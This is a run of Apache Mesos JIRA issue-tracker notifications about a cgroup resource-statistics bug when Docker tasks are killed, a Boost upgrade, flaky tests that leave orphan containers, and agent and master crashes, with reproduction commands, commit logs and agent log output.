Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat' user 4 system 0 Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' user 228058750 system 24506461 Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' user 228058750 system 24506461 Failed to open file '/proc/44224/cgroup' sleep [2]- Exit 1 ./test $(docker inspect sleep | jq .[].State.Pid) {noformat} > Mesos returns high resource usage when killing a Docker task. > - > > Key: MESOS-8480 > URL: https://issues.apache.org/jira/browse/MESOS-8480 > Project: Mesos > Issue Type: Bug > Components: cgroups >Reporter: Chun-Hung Hsiao >Assignee: Chun-Hung Hsiao >Priority: Major > Attachments: test.cpp > > > The way we get resource statistics for Docker tasks is through getting the > cgroup subsystem path through {{/proc//docker}} first (taking the > {{cpuacct}} subsystem as an example): > {noformat} > 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b > {noformat} > Then read >
[jira] [Updated] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.
[ https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Chun-Hung Hsiao updated MESOS-8480: --- Attachment: test.cpp > Mesos returns high resource usage when killing a Docker task. > - > > Key: MESOS-8480 > URL: https://issues.apache.org/jira/browse/MESOS-8480 > Project: Mesos > Issue Type: Bug > Components: cgroups >Reporter: Chun-Hung Hsiao >Assignee: Chun-Hung Hsiao >Priority: Major > Attachments: test.cpp > > > The way we get resource statistics for Docker tasks is through getting the > cgroup subsystem path through {{/proc//docker}} first (taking the > {{cpuacct}} subsystem as an example): > {noformat} > 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b > {noformat} > Then read > {{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}} > to get the statistics: > {noformat} > user 4 > system 0 > {noformat} > However, when a Docker container is being teared down, it seems that Docker > or the operation system will first move the process to the root cgroup before > actually killing it, making {{/proc//docker}} look like the following: > {noformat} > 9:cpuacct,cpu:/ > {noformat} > This makes > [{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935] > return a single '/', which in turn makes > [{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991] > read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the > statistics for the root cgroup: > {noformat} > user 228058750 > system 24506461 > {noformat} > This can be reproduced through test.cpp with the following command: > {noformat} > $ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect > sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep > ... 
> Reading file '/proc/44224/cgroup' > Reading file > '/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat' > user 4 > system 0 > Reading file '/proc/44224/cgroup' > Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' > user 228058750 > system 24506461 > Reading file '/proc/44224/cgroup' > Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' > user 228058750 > system 24506461 > Failed to open file '/proc/44224/cgroup' > sleep > [2]- Exit 1 ./test $(docker inspect sleep | jq > .[].State.Pid) > {noformat} -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Created] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.
Chun-Hung Hsiao created MESOS-8480: -- Summary: Mesos returns high resource usage when killing a Docker task. Key: MESOS-8480 URL: https://issues.apache.org/jira/browse/MESOS-8480 Project: Mesos Issue Type: Bug Components: cgroups Reporter: Chun-Hung Hsiao Assignee: Chun-Hung Hsiao The way we get resource statistics for Docker tasks is through getting the cgroup subsystem path through {{/proc//docker}} first (taking the {{cpuacct}} subsystem as an example): {noformat} 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b {noformat} Then read {{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}} to get the statistics: {noformat} user 4 system 0 {noformat} However, when a Docker container is being torn down, it seems that Docker or the operating system will first move the process to the root cgroup before actually killing it, making {{/proc//docker}} look like the following: {noformat} 9:cpuacct,cpu:/ {noformat} This makes [{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935] return a single '/', which in turn makes [{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991] read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the statistics for the root cgroup: {noformat} user 228058750 system 24506461 {noformat} This can be reproduced through test.cpp with the following command: {noformat} $ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep ... 
Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat' user 4 system 0 Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' user 228058750 system 24506461 Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' user 228058750 system 24506461 Failed to open file '/proc/44224/cgroup' sleep [2]- Exit 1 ./test $(docker inspect sleep | jq .[].State.Pid) {noformat} -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Created] (MESOS-8479) Document agne SIGUSR1 behavior.
James Peach created MESOS-8479: -- Summary: Document agne SIGUSR1 behavior. Key: MESOS-8479 URL: https://issues.apache.org/jira/browse/MESOS-8479 Project: Mesos Issue Type: Bug Components: agent, documentation Reporter: James Peach The agent enters shutdown when it receives {{SIGUSR1}}. We should document what this means, the corresponding behavior and how operators are intended to use this. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-3915) Upgrade vendored Boost
[ https://issues.apache.org/jira/browse/MESOS-3915?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Benjamin Bannier updated MESOS-3915: Shepherd: Benjamin Bannier > Upgrade vendored Boost > -- > > Key: MESOS-3915 > URL: https://issues.apache.org/jira/browse/MESOS-3915 > Project: Mesos > Issue Type: Bug >Reporter: Neil Conway >Assignee: Benno Evers >Priority: Minor > Labels: boost, mesosphere, tech-debt > Fix For: 1.6.0 > > > We should upgrade the vendored version of Boost to a newer version. Benefits: > * -Should properly fix MESOS-688- > * -Should fix MESOS-3799- > * Generally speaking, using a more modern version of Boost means we can take > advantage of bug fixes, optimizations, and new features. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Commented] (MESOS-3915) Upgrade vendored Boost
[ https://issues.apache.org/jira/browse/MESOS-3915?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336296#comment-16336296 ] Benjamin Bannier commented on MESOS-3915: - {noformat} commit ce0905fcb31a10ade0962a89235fa90b01edf01a Author: Benjamin Bannier Date: Tue Jan 23 14:47:37 2018 +0100 Updated mesos-tidy setup for upgraded Boost version. In a previous commit we updated the bundled Boost version. This patch updates the mesos-tidy setup to make sure we build the correct bundled Boost version when creating analysis prerequisites. Review: https://reviews.apache.org/r/65215/ commit a01b4c272848702d5bd3dd899e610a5459c4e57c Author: Benno Evers Date: Tue Jan 23 14:47:32 2018 +0100 Removed duplicate block in configure.ac. This block seems to have been copy/pasted from another place. Review: https://reviews.apache.org/r/62445/ commit 469363d4322c7acda7fd10acbe8822f610af5a43 Author: Benno Evers Date: Tue Jan 23 14:47:31 2018 +0100 Updated boost version. Review: https://reviews.apache.org/r/62161/ commit cd2774efde5e55cc027721086af14fbc78688849 Author: Benno Evers Date: Tue Jan 23 14:47:28 2018 +0100 Added UNREACHABLE() macro to __cxa_pure_virtual. The function __cxa_pure_virtual must not return, but newer versions of clang detect that the expansion of the RAW_LOG() macro contains returning code paths for arguments other than FATAL. Review: https://reviews.apache.org/r/62444/ commit a892a2e80255291e6cd5cb3b0e90b9a029989c99 Author: Benno Evers Date: Tue Jan 23 14:47:24 2018 +0100 Fixed stout build with newer boost versions. Starting from Boost 1.62, Boost.Variant added additional compile-time checks to its constructors to fix this issue: https://svn.boost.org/trac10/ticket/11602 However, this breaks some places in stout which try to access a derived class from a variant holding the base class. 
Review: https://reviews.apache.org/r/62160/ {noformat} > Upgrade vendored Boost > -- > > Key: MESOS-3915 > URL: https://issues.apache.org/jira/browse/MESOS-3915 > Project: Mesos > Issue Type: Bug >Reporter: Neil Conway >Assignee: Benno Evers >Priority: Minor > Labels: boost, mesosphere, tech-debt > Fix For: 1.6.0 > > > We should upgrade the vendored version of Boost to a newer version. Benefits: > * -Should properly fix MESOS-688- > * -Should fix MESOS-3799- > * Generally speaking, using a more modern version of Boost means we can take > advantage of bug fixes, optimizations, and new features. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Assigned] (MESOS-3915) Upgrade vendored Boost
[ https://issues.apache.org/jira/browse/MESOS-3915?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Benjamin Bannier reassigned MESOS-3915: --- Resolution: Fixed Assignee: Benno Evers Fix Version/s: 1.6.0 Closing this one as we have moved the bundled Boost to 1.65.0 after fixing issues preventing such an upgrade. > Upgrade vendored Boost > -- > > Key: MESOS-3915 > URL: https://issues.apache.org/jira/browse/MESOS-3915 > Project: Mesos > Issue Type: Bug >Reporter: Neil Conway >Assignee: Benno Evers >Priority: Minor > Labels: boost, mesosphere, tech-debt > Fix For: 1.6.0 > > > We should upgrade the vendored version of Boost to a newer version. Benefits: > * -Should properly fix MESOS-688- > * -Should fix MESOS-3799- > * Generally speaking, using a more modern version of Boost means we can take > advantage of bug fixes, optimizations, and new features. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Comment Edited] (MESOS-7506) Multiple tests leave orphan containers.
[ https://issues.apache.org/jira/browse/MESOS-7506?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336272#comment-16336272 ] Andrei Budnik edited comment on MESOS-7506 at 1/23/18 7:20 PM: --- While recovery is in progress for [the first slave|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/containerizer/linux_capabilities_isolator_tests.cpp#L733], calling [`StartSlave()`|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/containerizer/linux_capabilities_isolator_tests.cpp#L738] leads to calling [slave::Containerizer::create()|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/cluster.cpp#L431] to create a containerizer. An attempt to create a Mesos containerizer leads to calling [`cgroups::prepare`|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/slave/containerizer/mesos/linux_launcher.cpp#L124]. Finally, we get to the point where we try to create a ["test" container|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/linux/cgroups.cpp#L476]. The recovery process for the first slave [might detect|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/slave/containerizer/mesos/linux_launcher.cpp#L268-L301] this "test" container as an orphaned container. So there is a race between the recovery process for the first slave and the attempt to create a containerizer for the second agent. 
was (Author: abudnik): While recovery is in progress for [the first slave|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/containerizer/linux_capabilities_isolator_tests.cpp#L733], calling [`StartSlave()`|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/containerizer/linux_capabilities_isolator_tests.cpp#L738] leads to calling [slave::Containerizer::create()|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/cluster.cpp#L431] to create a containerizer. An attempt to create a mesos c'zer, leads to calling [`cgroups::prepare`|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/slave/containerizer/mesos/linux_launcher.cpp#L124]. Finally, we get to the point, where we try to create a ["test" container|[https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/linux/cgroups.cpp#L476].] So, the recovery process for the first slave [might detect|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/slave/containerizer/mesos/linux_launcher.cpp#L268-L301] this "test" container as an orphaned container. So, there is the race between recovery process for the first slave and an attempt to create a c'zer for the second agent. > Multiple tests leave orphan containers. 
> --- > > Key: MESOS-7506 > URL: https://issues.apache.org/jira/browse/MESOS-7506 > Project: Mesos > Issue Type: Bug > Components: containerization > Environment: Ubuntu 16.04 > Fedora 23 > other Linux distros >Reporter: Alexander Rukletsov >Assignee: Andrei Budnik >Priority: Major > Labels: containerizer, flaky-test, mesosphere > Attachments: KillMultipleTasks-badrun.txt, > ROOT_IsolatorFlags-badrun.txt, ROOT_IsolatorFlags-badrun2.txt, > ROOT_IsolatorFlags-badrun3.txt, ReconcileTasksMissingFromSlave-badrun.txt, > ResourceLimitation-badrun.txt, ResourceLimitation-badrun2.txt, > RestartSlaveRequireExecutorAuthentication-badrun.txt, > TaskWithFileURI-badrun.txt > > > I've observed a number of flaky tests that leave orphan containers upon > cleanup. A typical log looks like this: > {noformat} > ../../src/tests/cluster.cpp:580: Failure > Value of: containers->empty() > Actual: false > Expected: true > Failed to destroy containers: { da3e8aa8-98e7-4e72-a8fd-5d0bae960014 } > {noformat} > All currently affected tests: > {noformat} > SlaveTest.RestartSlaveRequireExecutorAuthentication // cannot reproduce any > more > ROOT_IsolatorFlags > {noformat} -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Commented] (MESOS-7506) Multiple tests leave orphan containers.
[ https://issues.apache.org/jira/browse/MESOS-7506?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336272#comment-16336272 ] Andrei Budnik commented on MESOS-7506: -- While recovery is in progress for [the first slave|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/containerizer/linux_capabilities_isolator_tests.cpp#L733], calling [`StartSlave()`|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/containerizer/linux_capabilities_isolator_tests.cpp#L738] leads to calling [slave::Containerizer::create()|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/cluster.cpp#L431] to create a containerizer. An attempt to create a Mesos containerizer leads to calling [`cgroups::prepare`|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/slave/containerizer/mesos/linux_launcher.cpp#L124]. Finally, we get to the point where we try to create a ["test" container|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/linux/cgroups.cpp#L476]. The recovery process for the first slave [might detect|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/slave/containerizer/mesos/linux_launcher.cpp#L268-L301] this "test" container as an orphaned container. So there is a race between the recovery process for the first slave and the attempt to create a containerizer for the second agent. > Multiple tests leave orphan containers. 
> --- > > Key: MESOS-7506 > URL: https://issues.apache.org/jira/browse/MESOS-7506 > Project: Mesos > Issue Type: Bug > Components: containerization > Environment: Ubuntu 16.04 > Fedora 23 > other Linux distros >Reporter: Alexander Rukletsov >Assignee: Andrei Budnik >Priority: Major > Labels: containerizer, flaky-test, mesosphere > Attachments: KillMultipleTasks-badrun.txt, > ROOT_IsolatorFlags-badrun.txt, ROOT_IsolatorFlags-badrun2.txt, > ROOT_IsolatorFlags-badrun3.txt, ReconcileTasksMissingFromSlave-badrun.txt, > ResourceLimitation-badrun.txt, ResourceLimitation-badrun2.txt, > RestartSlaveRequireExecutorAuthentication-badrun.txt, > TaskWithFileURI-badrun.txt > > > I've observed a number of flaky tests that leave orphan containers upon > cleanup. A typical log looks like this: > {noformat} > ../../src/tests/cluster.cpp:580: Failure > Value of: containers->empty() > Actual: false > Expected: true > Failed to destroy containers: { da3e8aa8-98e7-4e72-a8fd-5d0bae960014 } > {noformat} > All currently affected tests: > {noformat} > SlaveTest.RestartSlaveRequireExecutorAuthentication // cannot reproduce any > more > ROOT_IsolatorFlags > {noformat} -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Commented] (MESOS-6804) Running 'tty' inside a debug container that has a tty reports "Not a tty"
[ https://issues.apache.org/jira/browse/MESOS-6804?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336247#comment-16336247 ] Vinod Kone commented on MESOS-6804: --- Making this an improvement because tty applications work properly. The only issue is if someone types `tty` after attaching. > Running 'tty' inside a debug container that has a tty reports "Not a tty" > - > > Key: MESOS-6804 > URL: https://issues.apache.org/jira/browse/MESOS-6804 > Project: Mesos > Issue Type: Improvement >Reporter: Kevin Klues >Priority: Major > Labels: debugging, mesosphere > > We need to inject `/dev/console` into the container and map it to the slave > end of the TTY we are attached to. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-6804) Running 'tty' inside a debug container that has a tty reports "Not a tty"
[ https://issues.apache.org/jira/browse/MESOS-6804?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Vinod Kone updated MESOS-6804: -- Priority: Major (was: Critical) > Running 'tty' inside a debug container that has a tty reports "Not a tty" > - > > Key: MESOS-6804 > URL: https://issues.apache.org/jira/browse/MESOS-6804 > Project: Mesos > Issue Type: Improvement >Reporter: Kevin Klues >Priority: Major > Labels: debugging, mesosphere > > We need to inject `/dev/console` into the container and map it to the slave > end of the TTY we are attached to. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-6804) Running 'tty' inside a debug container that has a tty reports "Not a tty"
[ https://issues.apache.org/jira/browse/MESOS-6804?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Vinod Kone updated MESOS-6804: -- Issue Type: Improvement (was: Bug) > Running 'tty' inside a debug container that has a tty reports "Not a tty" > - > > Key: MESOS-6804 > URL: https://issues.apache.org/jira/browse/MESOS-6804 > Project: Mesos > Issue Type: Improvement >Reporter: Kevin Klues >Priority: Critical > Labels: debugging, mesosphere > > We need to inject `/dev/console` into the container and map it to the slave > end of the TTY we are attached to. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-7966) check for maintenance on agent causes fatal error
[ https://issues.apache.org/jira/browse/MESOS-7966?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Vinod Kone updated MESOS-7966: -- Sprint: Mesosphere Sprint 66, Mesosphere Sprint 74 (was: Mesosphere Sprint 66) > check for maintenance on agent causes fatal error > - > > Key: MESOS-7966 > URL: https://issues.apache.org/jira/browse/MESOS-7966 > Project: Mesos > Issue Type: Bug > Components: master >Affects Versions: 1.1.0 >Reporter: Rob Johnson >Assignee: Joseph Wu >Priority: Critical > Labels: reliability > > We interact with the maintenance API frequently to orchestrate gracefully > draining agents of tasks without impacting service availability. > Occasionally we seem to trigger a fatal error in Mesos when interacting with > the API. This happens relatively frequently, and impacts us when downstream > frameworks (marathon) react badly to leader elections. > Here is the log line that we see when the master dies: > {code} > F0911 12:18:49.543401 123748 hierarchical.cpp:872] Check failed: > slaves[slaveId].maintenance.isSome() > {code} > It's quite possible we're using the maintenance API in the wrong way. We're > happy to provide any other logs you need - please let me know what would be > useful for debugging. > Thanks. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Commented] (MESOS-7966) check for maintenance on agent causes fatal error
[ https://issues.apache.org/jira/browse/MESOS-7966?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336243#comment-16336243 ] Vinod Kone commented on MESOS-7966: --- [~kaysoky] Can you work on it in this sprint? > check for maintenance on agent causes fatal error > - > > Key: MESOS-7966 > URL: https://issues.apache.org/jira/browse/MESOS-7966 > Project: Mesos > Issue Type: Bug > Components: master >Affects Versions: 1.1.0 >Reporter: Rob Johnson >Assignee: Joseph Wu >Priority: Critical > Labels: reliability > > We interact with the maintenance API frequently to orchestrate gracefully > draining agents of tasks without impacting service availability. > Occasionally we seem to trigger a fatal error in Mesos when interacting with > the API. This happens relatively frequently, and impacts us when downstream > frameworks (marathon) react badly to leader elections. > Here is the log line that we see when the master dies: > {code} > F0911 12:18:49.543401 123748 hierarchical.cpp:872] Check failed: > slaves[slaveId].maintenance.isSome() > {code} > It's quite possible we're using the maintenance API in the wrong way. We're > happy to provide any other logs you need - please let me know what would be > useful for debugging. > Thanks. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Assigned] (MESOS-7966) check for maintenance on agent causes fatal error
[ https://issues.apache.org/jira/browse/MESOS-7966?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Vinod Kone reassigned MESOS-7966: - Assignee: Joseph Wu (was: Alexander Rukletsov) > check for maintenance on agent causes fatal error > - > > Key: MESOS-7966 > URL: https://issues.apache.org/jira/browse/MESOS-7966 > Project: Mesos > Issue Type: Bug > Components: master >Affects Versions: 1.1.0 >Reporter: Rob Johnson >Assignee: Joseph Wu >Priority: Critical > Labels: reliability > > We interact with the maintenance API frequently to orchestrate gracefully > draining agents of tasks without impacting service availability. > Occasionally we seem to trigger a fatal error in Mesos when interacting with > the API. This happens relatively frequently, and impacts us when downstream > frameworks (marathon) react badly to leader elections. > Here is the log line that we see when the master dies: > {code} > F0911 12:18:49.543401 123748 hierarchical.cpp:872] Check failed: > slaves[slaveId].maintenance.isSome() > {code} > It's quite possible we're using the maintenance API in the wrong way. We're > happy to provide any other logs you need - please let me know what would be > useful for debugging. > Thanks. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-7622) Agent can crash if a HTTP executor tries to retry subscription in running state.
[ https://issues.apache.org/jira/browse/MESOS-7622?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Vinod Kone updated MESOS-7622: -- Sprint: Mesosphere Sprint 74 > Agent can crash if a HTTP executor tries to retry subscription in running > state. > > > Key: MESOS-7622 > URL: https://issues.apache.org/jira/browse/MESOS-7622 > Project: Mesos > Issue Type: Bug > Components: agent, executor >Affects Versions: 1.2.2 >Reporter: Aaron Wood >Assignee: Anand Mazumdar >Priority: Critical > > It is possible that a running executor might retry its subscribe request. > This can lead to a crash if it previously had any launched tasks. Note that > the executor would still be able to subscribe again when the agent process > restarts and is recovering. > {code} > sudo ./mesos-agent --master=10.0.2.15:5050 --work_dir=/tmp/slave > --isolation=cgroups/cpu,cgroups/mem,disk/du,network/cni,filesystem/linux,docker/runtime > --image_providers=docker --image_provisioner_backend=overlay > --containerizers=mesos --launcher_dir=$(pwd) > --executor_environment_variables='{"LD_LIBRARY_PATH": > "/home/aaron/Code/src/mesos/build/src/.libs"}' > WARNING: Logging before InitGoogleLogging() is written to STDERR > I0605 14:58:23.748180 10710 main.cpp:323] Build: 2017-06-02 17:09:05 UTC by > aaron > I0605 14:58:23.748252 10710 main.cpp:324] Version: 1.4.0 > I0605 14:58:23.755409 10710 systemd.cpp:238] systemd version `232` detected > I0605 14:58:23.755450 10710 main.cpp:433] Initializing systemd state > I0605 14:58:23.763049 10710 systemd.cpp:326] Started systemd slice > `mesos_executors.slice` > I0605 14:58:23.763777 10710 resolver.cpp:69] Creating default secret resolver > I0605 14:58:23.764214 10710 containerizer.cpp:230] Using isolation: > cgroups/cpu,cgroups/mem,disk/du,network/cni,filesystem/linux,docker/runtime,volume/image,environment_secret > I0605 14:58:23.767192 10710 linux_launcher.cpp:150] Using > /sys/fs/cgroup/freezer as the freezer hierarchy for the Linux launcher > 
E0605 14:58:23.770179 10710 shell.hpp:107] Command 'hadoop version 2>&1' > failed; this is the output: > sh: 1: hadoop: not found > I0605 14:58:23.770217 10710 fetcher.cpp:69] Skipping URI fetcher plugin > 'hadoop' as it could not be created: Failed to create HDFS client: Failed to > execute 'hadoop version 2>&1'; the command was either not found or exited > with a non-zero exit status: 127 > I0605 14:58:23.770643 10710 provisioner.cpp:255] Using default backend > 'overlay' > I0605 14:58:23.785892 10710 slave.cpp:248] Mesos agent started on > (1)@127.0.1.1:5051 > I0605 14:58:23.785957 10710 slave.cpp:249] Flags at startup: > --appc_simple_discovery_uri_prefix="http://; > --appc_store_dir="/tmp/mesos/store/appc" --authenticate_http_readonly="false" > --authenticate_http_readwrite="false" --authenticatee="crammd5" > --authentication_backoff_factor="1secs" --authorizer="local" > --cgroups_cpu_enable_pids_and_tids_count="false" --cgroups_enable_cfs="false" > --cgroups_hierarchy="/sys/fs/cgroup" --cgroups_limit_swap="false" > --cgroups_root="mesos" --container_disk_watch_interval="15secs" > --containerizers="mesos" --default_role="*" --disk_watch_interval="1mins" > --docker="docker" --docker_kill_orphans="true" > --docker_registry="https://registry-1.docker.io; --docker_remove_delay="6hrs" > --docker_socket="/var/run/docker.sock" --docker_stop_timeout="0ns" > --docker_store_dir="/tmp/mesos/store/docker" > --docker_volume_checkpoint_dir="/var/run/mesos/isolators/docker/volume" > --enforce_container_disk_quota="false" > --executor_environment_variables="{"LD_LIBRARY_PATH":"\/home\/aaron\/Code\/src\/mesos\/build\/src\/.libs"}" > --executor_registration_timeout="1mins" > --executor_reregistration_timeout="2secs" > --executor_shutdown_grace_period="5secs" > --fetcher_cache_dir="/tmp/mesos/fetch" --fetcher_cache_size="2GB" > --frameworks_home="" --gc_delay="1weeks" --gc_disk_headroom="0.1" > --hadoop_home="" --help="false" --hostname_lookup="true" > 
--http_command_executor="false" --http_heartbeat_interval="30secs" > --image_providers="docker" --image_provisioner_backend="overlay" > --initialize_driver_logging="true" > --isolation="cgroups/cpu,cgroups/mem,disk/du,network/cni,filesystem/linux,docker/runtime" > --launcher="linux" --launcher_dir="/home/aaron/Code/src/mesos/build/src" > --logbufsecs="0" --logging_level="INFO" --master="10.0.2.15:5050" > --max_completed_executors_per_framework="150" > --oversubscribed_resources_interval="15secs" --perf_duration="10secs" > --perf_interval="1mins" --port="5051" --qos_correction_interval_min="0ns" > --quiet="false" --recover="reconnect" --recovery_timeout="15mins" > --registration_backoff_factor="1secs" --revocable_cpu_low_priority="true" >
[jira] [Updated] (MESOS-7911) Non-checkpointing framework's tasks should not be marked LOST when agent disconnects.
[ https://issues.apache.org/jira/browse/MESOS-7911?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Vinod Kone updated MESOS-7911: -- Sprint: Mesosphere Sprint 74 > Non-checkpointing framework's tasks should not be marked LOST when agent > disconnects. > - > > Key: MESOS-7911 > URL: https://issues.apache.org/jira/browse/MESOS-7911 > Project: Mesos > Issue Type: Bug >Reporter: Benjamin Mahler >Priority: Critical > Labels: reliability > > Currently, when a framework with checkpointing disabled has tasks running on an > agent and that agent disconnects from the master, the master will mark those > tasks LOST and remove them from its memory. The assumption is that the agent > is disconnecting because it terminated. > However, it's possible that this disconnection occurred due to a transient > loss of connectivity and the agent re-connects while never having terminated. > This case violates our assumption of there being no unknown tasks to the > master: > ``` > void Master::reconcileKnownSlave( > Slave* slave, > const vector<ExecutorInfo>& executors, > const vector<Task>& tasks) > { > ... > // TODO(bmahler): There's an implicit assumption here the slave > // cannot have tasks unknown to the master. This _should_ be the > // case since the causal relationship is: > // slave removes task -> master removes task > // Add error logging for any violations of this assumption! > ``` > As a result, the tasks would remain on the agent but the master would not > know about them! > A more appropriate action here would be: > (1) When an agent disconnects, mark the tasks as unreachable. > (a) If the framework is not partition aware, only show it the last known > task state. > (b) If the framework is partition aware, let it know that it's now > unreachable. > (2) If the agent re-connects: > (a) And the agent had restarted, let the non-checkpointing framework know > its tasks are GONE/LOST. > (b) If the agent still holds the tasks, the tasks are restored as reachable. 
> (3) If the agent gets removed: > (a) For partition aware non-checkpointing frameworks, let them know the > tasks are unreachable. > (b) For non partition aware non-checkpointing frameworks, let them know the > tasks are lost and kill them if the agent comes back. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Assigned] (MESOS-7911) Non-checkpointing framework's tasks should not be marked LOST when agent disconnects.
[ https://issues.apache.org/jira/browse/MESOS-7911?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Vinod Kone reassigned MESOS-7911: - Assignee: (was: Gilbert Song) > Non-checkpointing framework's tasks should not be marked LOST when agent > disconnects. > - > > Key: MESOS-7911 > URL: https://issues.apache.org/jira/browse/MESOS-7911 > Project: Mesos > Issue Type: Bug >Reporter: Benjamin Mahler >Priority: Critical > Labels: reliability > > Currently, when a framework with checkpointing disabled has tasks running on an > agent and that agent disconnects from the master, the master will mark those > tasks LOST and remove them from its memory. The assumption is that the agent > is disconnecting because it terminated. > However, it's possible that this disconnection occurred due to a transient > loss of connectivity and the agent re-connects while never having terminated. > This case violates our assumption of there being no unknown tasks to the > master: > ``` > void Master::reconcileKnownSlave( > Slave* slave, > const vector<ExecutorInfo>& executors, > const vector<Task>& tasks) > { > ... > // TODO(bmahler): There's an implicit assumption here the slave > // cannot have tasks unknown to the master. This _should_ be the > // case since the causal relationship is: > // slave removes task -> master removes task > // Add error logging for any violations of this assumption! > ``` > As a result, the tasks would remain on the agent but the master would not > know about them! > A more appropriate action here would be: > (1) When an agent disconnects, mark the tasks as unreachable. > (a) If the framework is not partition aware, only show it the last known > task state. > 